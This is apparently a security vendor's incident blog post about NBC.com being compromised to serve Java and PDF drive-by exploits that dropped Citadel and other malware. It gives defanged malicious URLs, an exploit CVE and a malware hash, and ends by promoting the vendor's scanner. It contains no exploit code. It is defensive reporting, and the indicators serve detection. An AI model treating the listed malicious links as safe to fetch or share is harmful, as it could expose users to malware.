A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.com infecting its visitors with malicious software (malware). We were investigating this as well and found the following interesting facts.
Update: Fox-IT has also posted a blog item on the incident.
There were two exploits links on the NBC website. The first one was on the main default (entry) page. And the second one was located on hxxp://www.nbc.com/assets/core/js/s_wrapper.js
It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which is already sinkholed:
An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages. We’ve seen them linking to e.g.:
RedKit was also used last year during the Telegraaf attack in The Netherlands which served the Citadel Trojan from the Pobelka botnet (Dutch). The Pobelka botnet stole highly sensitive information (including usernames, passwords, certificates, documents and other data), 750GB in size, from over 150.000 computers located in networks from the Dutch government, hospitals, vital infrastructures like water and power plants, airlines, multinationals and other companies.
On-Demand Detection and Timeline
HitmanPro’s behavioral scan detects zero-day Citadel malware quite easily as can be seen in the below screenshot.
The new forensic cluster feature of HitmanPro establish a pretty timeline – post infection. So even if you got infected a few days ago, HitmanPro provides evidence on how that happened.
The ZeroAccess malware moderates an affected user’s Internet experience by modifying search results, and generates pay-per-click advertising revenue for its controllers, the cybercriminals. ZeroAccess is a dangerous threat that uses stealth techniques in order to hinder its detection and removal.
The attack also served an unknown malware binary, connecting to various websites:
Some antivirus vendors identify this malware as Zbot or a rootkit (MD5: 1fa5afe1ddcd083d40b5b330fd9b3613), but it is most definitely not Zbot and it’s not a rootkit either. The malware binary has a curious filename (3S4H3S.exe) and an interesting string at the end “SadokBdi”. If you Google Sadok or Kodas, you come across some interesting webpages.
While the attack is ongoing, Facebook.com is preventing posts to NBC.com, as can be seen from this screenshot:
Perform Second Opinion Scan
If you’ve visited NBC.com today, you should perform a FREE second opinion scan to see if your computer got infected. You can download HitmanPro from here: get.hitmanpro.com
Late Night Show Jimmy Fallon
4 hours after the initial detection, the webpages of NBC.com still contained iframes opening exploit sites. In addition, we have seen other webpages like hxxp://www.latenightwithjimmyfallon.com and hxxp://www.jaylenosgarage.com serving some of the same links as NBC.com. This is also confirmed by the guys at Securi Blog.